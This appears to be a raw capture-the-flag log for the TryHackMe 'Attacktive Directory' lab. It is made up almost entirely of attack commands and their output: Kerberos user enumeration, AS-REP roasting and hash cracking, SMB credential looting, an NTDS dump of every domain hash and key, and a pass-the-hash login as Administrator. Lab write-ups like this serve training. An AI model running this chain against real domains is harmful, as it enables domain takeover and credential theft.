nmap result

nmap -sC -sV 10.10.149.125 -p- -oA 10.10.149.125_nmap_result
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-24 02:04 +0630
Stats: 0:00:53 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 5.13% done; ETC: 02:21 (0:16:20 remaining)
Stats: 0:02:51 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 15.57% done; ETC: 02:22 (0:15:27 remaining)
Stats: 0:07:03 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 38.28% done; ETC: 02:23 (0:11:22 remaining)
Stats: 0:11:01 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 65.50% done; ETC: 02:21 (0:05:48 remaining)
Stats: 0:14:06 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 55.56% done; ETC: 02:19 (0:00:14 remaining)
Nmap scan report for 10.10.149.125
Host is up (0.22s latency).
Not shown: 65508 closed tcp ports (conn-refused)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-12-23 19:48:39Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2023-12-23T19:49:47+00:00; +3s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: THM-AD
|   NetBIOS_Domain_Name: THM-AD
|   NetBIOS_Computer_Name: ATTACKTIVEDIREC
|   DNS_Domain_Name: spookysec.local
|   DNS_Computer_Name: AttacktiveDirectory.spookysec.local
|   DNS_Tree_Name: spookysec.local
|   Product_Version: 10.0.17763
|_  System_Time: 2023-12-23T19:49:38+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2023-12-22T19:31:37
|_Not valid after:  2024-06-22T19:31:37
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49684/tcp open  msrpc         Microsoft Windows RPC
49698/tcp open  msrpc         Microsoft Windows RPC
49817/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 2s, deviation: 0s, median: 2s
| smb2-time: 
|   date: 2023-12-23T19:49:38
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 910.46 seconds

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

kerberos user enumeration

./kerbrute_linux_amd64 userenum -d spookysec.local userlist.txt --dc 10.10.149.125

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 12/24/23 - Ronnie Flathers @ropnop

2023/12/24 02:12:36 >  Using KDC(s):
2023/12/24 02:12:36 >  	10.10.149.125:88

2023/12/24 02:12:37 >  [+] VALID USERNAME:	 james@spookysec.local
2023/12/24 02:12:41 >  [+] VALID USERNAME:	 svc-admin@spookysec.local
2023/12/24 02:12:45 >  [+] VALID USERNAME:	 James@spookysec.local
2023/12/24 02:12:47 >  [+] VALID USERNAME:	 robin@spookysec.local
2023/12/24 02:13:06 >  [+] VALID USERNAME:	 darkstar@spookysec.local
2023/12/24 02:13:17 >  [+] VALID USERNAME:	 administrator@spookysec.local
2023/12/24 02:13:40 >  [+] VALID USERNAME:	 backup@spookysec.local
2023/12/24 02:13:51 >  [+] VALID USERNAME:	 paradox@spookysec.local
2023/12/24 02:15:01 >  [+] VALID USERNAME:	 JAMES@spookysec.local
2023/12/24 02:15:24 >  [+] VALID USERNAME:	 Robin@spookysec.local
2023/12/24 02:17:45 >  [+] VALID USERNAME:	 Administrator@spookysec.local
2023/12/24 02:22:32 >  [+] VALID USERNAME:	 Darkstar@spookysec.local
2023/12/24 02:24:05 >  [+] VALID USERNAME:	 Paradox@spookysec.local
2023/12/24 02:29:15 >  [+] VALID USERNAME:	 DARKSTAR@spookysec.local
2023/12/24 02:30:49 >  [+] VALID USERNAME:	 ori@spookysec.local
2023/12/24 02:33:36 >  [+] VALID USERNAME:	 ROBIN@spookysec.local
2023/12/24 02:40:24 >  Done! Tested 73317 usernames (16 valid) in 1667.908 seconds

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

kerberos nopassworduser enumeration

impacket-GetNPUsers -usersfile valid_users.txt -dc-ip 10.10.149.125 -no-pass spookysec.local/ 
Impacket v0.11.0 - Copyright 2023 Fortra

[-] User james@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-admin@spookysec.local@SPOOKYSEC.LOCAL:177cc33db043704cd3217edee21b5fd8$18815d30614d59907cd6582a9be1054a7544541cc6eca63bbf617bc49a087e2e38f8df568e929236db26f50b01fbadf3b43c40fd2398ae02f27db344ccd1dc68e9fc27e258b458616f2aaf623f3e9ccf4e6350c0ce44c2fdf5477bd182eaf44b78e071c1ccb2453d0cd0fcd22d01db4ca46d5ba40f8def94145adfc693157839f822623a27e28604358d89496c1ebdaae553b9af7bcf0bfb40870a6c986773e35113d83c764978f952a7e762ed9356ccb308783cf04330917b81569f85a38bca401d02d46dfe25c5d242e99b60425dabe00227321f001aaa87d46f37fb6261c897045596d064b3a3d1b96df9bb234526ca1b
[-] User James@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User robin@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User darkstar@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User administrator@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User backup@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User paradox@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User JAMES@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Robin@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Darkstar@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Paradox@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User DARKSTAR@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ori@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ROBIN@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Crack above nopassworduser kerberos hash with hashcat

hashcat -m 18200 kerberos_hash passwordlist.txt

$krb5asrep$23$svc-admin@spookysec.local@SPOOKYSEC.LOCAL:177cc33db043704cd3217edee21b5fd8$18815d30614d59907cd6582a9be1054a7544541cc6eca63bbf617bc49a087e2e38f8df568e929236db26f50b01fbadf3b43c40fd2398ae02f27db344ccd1dc68e9fc27e258b458616f2aaf623f3e9ccf4e6350c0ce44c2fdf5477bd182eaf44b78e071c1ccb2453d0cd0fcd22d01db4ca46d5ba40f8def94145adfc693157839f822623a27e28604358d89496c1ebdaae553b9af7bcf0bfb40870a6c986773e35113d83c764978f952a7e762ed9356ccb308783cf04330917b81569f85a38bca401d02d46dfe25c5d242e99b60425dabe00227321f001aaa87d46f37fb6261c897045596d064b3a3d1b96df9bb234526ca1b:management2005
                                                          
Session..........: hashcat
Status...........: Cracked

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

smb enumeration with above svc-admin user creds

smbmap -H 10.10.149.125 -u svc-admin -p management2005

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[+] IP: 10.10.149.125:445	Name: 10.10.149.125       	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	backup                                            	READ ONLY	
	C$                                                	NO ACCESS	Default share
	IPC$                                              	READ ONLY	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	SYSVOL                                            	READ ONLY	Logon server share



Got backup creds from backup smbshare

smbclient //10.10.149.125/backup -U svc-admin
Password for [WORKGROUP\svc-admin]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sun Apr  5 01:38:39 2020
  ..                                  D        0  Sun Apr  5 01:38:39 2020
  backup_credentials.txt              A       48  Sun Apr  5 01:38:53 2020

		8247551 blocks of size 4096. 3561096 blocks available
smb: \> get backup_credentials.txt
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> exit

Got backup user creds

┌──(pichi㉿kali)-[~/Desktop/THM/attacktivedirectory]
└─$ cat backup_credentials.txt                                       
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw                                                                                                                                                                                                                                 
┌──(pichi㉿kali)-[~/Desktop/THM/attacktivedirectory]
└─$ echo "YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw" | base64 -d                                                                               
backup@spookysec.local:backup2517860

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Dump NTDS with impacket-secretsdump

impacket-secretsdump spookysec.local/backup:backup2517860@10.10.149.125
Impacket v0.11.0 - Copyright 2023 Fortra

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:c09d958d05f5fc586772540d6d961316:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:713955f08a8654fb8f70afe0e24bb50eed14e53c8b2274c0c701ad2948ee0f48
Administrator:aes128-cts-hmac-sha1-96:e9077719bc770aff5d8bfc2d54d226ae
Administrator:des-cbc-md5:2079ce0e5df189ad
krbtgt:aes256-cts-hmac-sha1-96:b52e11789ed6709423fd7276148cfed7dea6f189f3234ed0732725cd77f45afc
krbtgt:aes128-cts-hmac-sha1-96:e7301235ae62dd8884d9b890f38e3902
krbtgt:des-cbc-md5:b94f97e97fabbf5d
spookysec.local\skidy:aes256-cts-hmac-sha1-96:3ad697673edca12a01d5237f0bee628460f1e1c348469eba2c4a530ceb432b04
spookysec.local\skidy:aes128-cts-hmac-sha1-96:484d875e30a678b56856b0fef09e1233
spookysec.local\skidy:des-cbc-md5:b092a73e3d256b1f
spookysec.local\breakerofthings:aes256-cts-hmac-sha1-96:4c8a03aa7b52505aeef79cecd3cfd69082fb7eda429045e950e5783eb8be51e5
spookysec.local\breakerofthings:aes128-cts-hmac-sha1-96:38a1f7262634601d2df08b3a004da425
spookysec.local\breakerofthings:des-cbc-md5:7a976bbfab86b064
spookysec.local\james:aes256-cts-hmac-sha1-96:1bb2c7fdbecc9d33f303050d77b6bff0e74d0184b5acbd563c63c102da389112
spookysec.local\james:aes128-cts-hmac-sha1-96:08fea47e79d2b085dae0e95f86c763e6
spookysec.local\james:des-cbc-md5:dc971f4a91dce5e9
spookysec.local\optional:aes256-cts-hmac-sha1-96:fe0553c1f1fc93f90630b6e27e188522b08469dec913766ca5e16327f9a3ddfe
spookysec.local\optional:aes128-cts-hmac-sha1-96:02f4a47a426ba0dc8867b74e90c8d510
spookysec.local\optional:des-cbc-md5:8c6e2a8a615bd054
spookysec.local\sherlocksec:aes256-cts-hmac-sha1-96:80df417629b0ad286b94cadad65a5589c8caf948c1ba42c659bafb8f384cdecd
spookysec.local\sherlocksec:aes128-cts-hmac-sha1-96:c3db61690554a077946ecdabc7b4be0e
spookysec.local\sherlocksec:des-cbc-md5:08dca4cbbc3bb594
spookysec.local\darkstar:aes256-cts-hmac-sha1-96:35c78605606a6d63a40ea4779f15dbbf6d406cb218b2a57b70063c9fa7050499
spookysec.local\darkstar:aes128-cts-hmac-sha1-96:461b7d2356eee84b211767941dc893be
spookysec.local\darkstar:des-cbc-md5:758af4d061381cea
spookysec.local\Ori:aes256-cts-hmac-sha1-96:5534c1b0f98d82219ee4c1cc63cfd73a9416f5f6acfb88bc2bf2e54e94667067
spookysec.local\Ori:aes128-cts-hmac-sha1-96:5ee50856b24d48fddfc9da965737a25e
spookysec.local\Ori:des-cbc-md5:1c8f79864654cd4a
spookysec.local\robin:aes256-cts-hmac-sha1-96:8776bd64fcfcf3800df2f958d144ef72473bd89e310d7a6574f4635ff64b40a3
spookysec.local\robin:aes128-cts-hmac-sha1-96:733bf907e518d2334437eacb9e4033c8
spookysec.local\robin:des-cbc-md5:89a7c2fe7a5b9d64
spookysec.local\paradox:aes256-cts-hmac-sha1-96:64ff474f12aae00c596c1dce0cfc9584358d13fba827081afa7ae2225a5eb9a0
spookysec.local\paradox:aes128-cts-hmac-sha1-96:f09a5214e38285327bb9a7fed1db56b8
spookysec.local\paradox:des-cbc-md5:83988983f8b34019
spookysec.local\Muirland:aes256-cts-hmac-sha1-96:81db9a8a29221c5be13333559a554389e16a80382f1bab51247b95b58b370347
spookysec.local\Muirland:aes128-cts-hmac-sha1-96:2846fc7ba29b36ff6401781bc90e1aaa
spookysec.local\Muirland:des-cbc-md5:cb8a4a3431648c86
spookysec.local\horshark:aes256-cts-hmac-sha1-96:891e3ae9c420659cafb5a6237120b50f26481b6838b3efa6a171ae84dd11c166
spookysec.local\horshark:aes128-cts-hmac-sha1-96:c6f6248b932ffd75103677a15873837c
spookysec.local\horshark:des-cbc-md5:a823497a7f4c0157
spookysec.local\svc-admin:aes256-cts-hmac-sha1-96:effa9b7dd43e1e58db9ac68a4397822b5e68f8d29647911df20b626d82863518
spookysec.local\svc-admin:aes128-cts-hmac-sha1-96:aed45e45fda7e02e0b9b0ae87030b3ff
spookysec.local\svc-admin:des-cbc-md5:2c4543ef4646ea0d
spookysec.local\backup:aes256-cts-hmac-sha1-96:23566872a9951102d116224ea4ac8943483bf0efd74d61fda15d104829412922
spookysec.local\backup:aes128-cts-hmac-sha1-96:843ddb2aec9b7c1c5c0bf971c836d197
spookysec.local\backup:des-cbc-md5:d601e9469b2f6d89
spookysec.local\a-spooks:aes256-cts-hmac-sha1-96:cfd00f7ebd5ec38a5921a408834886f40a1f40cda656f38c93477fb4f6bd1242
spookysec.local\a-spooks:aes128-cts-hmac-sha1-96:31d65c2f73fb142ddc60e0f3843e2f68
spookysec.local\a-spooks:des-cbc-md5:e09e4683ef4a4ce9
ATTACKTIVEDIREC$:aes256-cts-hmac-sha1-96:aceddeececde52e92b91d117088c7e5077f35628c9ce44cfaf3c07204df88024
ATTACKTIVEDIREC$:aes128-cts-hmac-sha1-96:ae16b254aacfc1738576e9228cd5a053
ATTACKTIVEDIREC$:des-cbc-md5:ae61e598c2252c8c
[*] Cleaning up...

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Another way to dump is using crackmapexec

crackmapexec smb 10.10.149.125 -d spookysec.local -u backup -p backup2517860 --ntds
SMB         10.10.149.125   445    ATTACKTIVEDIREC  [*] Windows 10.0 Build 17763 x64 (name:ATTACKTIVEDIREC) (domain:spookysec.local) (signing:True) (SMBv1:False)
SMB         10.10.149.125   445    ATTACKTIVEDIREC  [+] spookysec.local\backup:backup2517860 
SMB         10.10.149.125   445    ATTACKTIVEDIREC  [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
SMB         10.10.149.125   445    ATTACKTIVEDIREC  [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         10.10.149.125   445    ATTACKTIVEDIREC  Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
SMB         10.10.149.125   445    ATTACKTIVEDIREC  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.149.125   445    ATTACKTIVEDIREC  krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
SMB         10.10.149.125   445    ATTACKTIVEDIREC  spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
SMB         10.10.149.125   445    ATTACKTIVEDIREC  spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
SMB         10.10.149.125   445    ATTACKTIVEDIREC  spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
SMB         10.10.149.125   445    ATTACKTIVEDIREC  spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
SMB         10.10.149.125   445    ATTACKTIVEDIREC  spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
SMB         10.10.149.125   445    ATTACKTIVEDIREC  spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
SMB         10.10.149.125   445    ATTACKTIVEDIREC  spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
SMB         10.10.149.125   445    ATTACKTIVEDIREC  spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
SMB         10.10.149.125   445    ATTACKTIVEDIREC  spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
SMB         10.10.149.125   445    ATTACKTIVEDIREC  spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
SMB         10.10.149.125   445    ATTACKTIVEDIREC  spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
SMB         10.10.149.125   445    ATTACKTIVEDIREC  spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
SMB         10.10.149.125   445    ATTACKTIVEDIREC  spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
SMB         10.10.149.125   445    ATTACKTIVEDIREC  spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
SMB         10.10.149.125   445    ATTACKTIVEDIREC  ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:c09d958d05f5fc586772540d6d961316:::
SMB         10.10.149.125   445    ATTACKTIVEDIREC  [+] Dumped 18 NTDS hashes to /root/.cme/logs/ATTACKTIVEDIREC_10.10.149.125_2023-12-24_025746.ntds of which 17 were added to the database

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Retriving Flags with evil-winrm

evil-winrm -i 10.10.149.125 -u Administrator -H "0e0363213e37b94221497260b0bcb4fc"

*Evil-WinRM* PS C:\Users\svc-admin\Desktop> more user.txt.txt
TryHackMe{K3rb3r0s_Pr3_4uth}

*Evil-WinRM* PS C:\Users\backup\Desktop> more PrivEsc.txt
TryHackMe{B4ckM3UpSc0tty!}

*Evil-WinRM* PS C:\Users\Administrator\Desktop> more root.txt
TryHackMe{4ctiveD1rectoryM4st3r}

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

